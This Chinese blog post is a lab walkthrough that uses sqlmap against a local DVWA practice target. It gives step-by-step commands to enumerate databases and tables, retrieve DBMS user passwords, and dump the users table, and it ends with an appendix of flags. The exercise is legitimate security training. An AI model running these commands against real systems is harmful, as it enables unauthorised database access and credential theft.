欢迎来到训练场,SQL注入DVWA靶机

本文共有772字和12张插图,读完大约需要5分钟。

1 简介

本文作为一个实验,练习一下sql注入。
本文共有670个字、12张图片,读完大约需要3分钟。

2 本文环境

一台CentOS7 32位 虚拟机,一台Kali 2020.1b 32位 虚拟机。CentOS上安装LNMP环境、DVWA,Kali虚拟机系统本身带有sqlmap。

3 登录DVWA

在Kali的浏览器上访问搭建好的dvwa,登录admin用户之后点DVWA Security,在下拉框中选Low,点Submit,在这里插入图片描述
点SQL Injection,点Submit
在这里插入图片描述
复制浏览器地址栏的URL
在这里插入图片描述

4 打开sqlmap

在Kali里打开Sqlmap,输入如下命令,

sqlmap -u "http://192.168.1.128/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=blb32d0eb5arnt0r80eloeblb1" --batch 

检测到对方的DBM为5.5以上版本:
在这里插入图片描述

5 sql注入命令

5.1 获取所有数据库名

输入如下命令:

sqlmap  -u  “URL”   --cookie  “   ”  --batch  --dbs   //注入数据库

检测到对方的数据库名称
在这里插入图片描述

5.2 获取某数据库中的所有表名

输入如下命令:

 sqlmap  -u  “URL”   --cookie  “   ”  --batch  -D  dvwa  --tables 

获取到数据库名为dvwa中的表名:
在这里插入图片描述

5.3 获取到数据库管理系统的用户名和密码

输入如下命令:

sqlmap  -u  “URL”   --cookie  “   ”  --batch   --users  --passwords

获取到数据库管理系统的用户名和密码:
在这里插入图片描述

5.4 获取到某数据库中某表中的两列数据

输入如下命令

 sqlmap  -u  “URL”   --cookie  “   ”  --batch  -D  dvwa  -T users  -C  “user,password”  --dump 

获取到名为dvwa的数据库中表名为users中的用户名和密码
在这里插入图片描述

5.5 获取到数据库中所有的表名

输入如下命令

sqlmap  -u  “URL”  --tables   //猜表名

获取到数据库中所有的表名:
在这里插入图片描述
输入如下命令

sqlmap  -u  “URL”  --columns  -T   //猜解列名

测试不成功,获取失败:
在这里插入图片描述

5.6 爆出某表中某列数据

输入如下命令

sqlmap  -u  “URL”  --dump  -C  “列名”  -T  “表名”   //爆出字段数据

测试不成功,获取失败:
在这里插入图片描述

6 附录

--dbs  //所有数据库
--tables //所有表
--columns //所有列
--users  //用户名
---count  //统计条数
--level   //测试等级 (1-5) 默认1  cookie  2   http 头3 
  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值